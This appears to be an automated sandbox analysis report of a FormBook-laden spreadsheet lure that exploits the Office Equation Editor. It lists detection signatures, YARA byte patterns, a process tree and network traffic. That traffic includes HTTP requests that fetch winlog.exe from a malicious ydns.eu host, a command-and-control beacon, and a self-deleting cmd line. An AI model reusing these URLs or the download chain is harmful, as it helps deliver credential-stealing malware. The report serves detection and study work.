Analysis Report Request for quotation.xlsx

Overview

General Information

Sample Name: Request for quotation.xlsx
Analysis ID: 321122
MD5: 109bae1300099a20ad3df28d09095bf1
SHA1: dd2c886624df876a75389a5690cf55fd59a0b217
SHA256: 1154f054c7344a07eed067053d6f3cfec18bc3aee5078e94c3a77bba3827bb06
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2412 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2924 cmdline: 'C:\Users\Public\vbc.exe' MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 3024 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 3020 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 2948 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmd.exe (PID: 2232 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
            • cmd.exe (PID: 2224 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(17 further entries not shown)

Unpacked PEs

Source: 7.2.vbc.exe.400000.2.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 7.2.vbc.exe.400000.2.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 7.2.vbc.exe.400000.2.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Source: 7.2.vbc.exe.400000.2.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 7.2.vbc.exe.400000.2.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further entry not shown)

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 103.141.138.87, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2412, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
Sigma detected: Execution in Non-Executable Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
Sigma detected: Suspicious Program Location Process Starts
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe; Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\Public\vbc.exe; Avira: detection malicious, Label: TR/AD.Swotter.yiimo
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe; Avira: detection malicious, Label: TR/AD.Swotter.yiimo
Multi AV Scanner detection for domain / URL
Source: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu; Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe; ReversingLabs: Detection: 33%
Source: C:\Users\Public\vbc.exe; ReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: Request for quotation.xlsx; Virustotal: Detection: 33%
Source: Request for quotation.xlsx; ReversingLabs: Detection: 22%
Yara detected FormBook
Source: Yara match; File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe; Joe Sandbox ML: detected
Source: 7.2.vbc.exe.400000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\vbc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\Public\vbc.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then mov edi, edi
Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4x nop then pop edi
Source: global traffic; DNS query: name: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Date: Fri, 20 Nov 2020 10:27:54 GMT; Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38; Last-Modified: Thu, 19 Nov 2020 20:54:09 GMT; ETag: "eb000-5b47bede9f95e"; Accept-Ranges: bytes; Content-Length: 962560; Keep-Alive: timeout=5, max=100; Connection: Keep-Alive; Content-Type: application/x-msdownload; Data Raw: [hex dump omitted]
Source: global traffic; HTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1; Host: www.segredosdocopywriting.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: global traffic; HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu; Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
Source: global traffic; HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E); Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1; Host: www.segredosdocopywriting.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2258936880.0000000004F30000.00000002.00000001.sdmp; String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00419D60 NtCreateFile,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00419E10 NtReadFile,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00419E90 NtClose,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00419E0A NtReadFile,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00419E8F NtClose,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A300C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A30078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A30048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe; Code function: 7_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk,
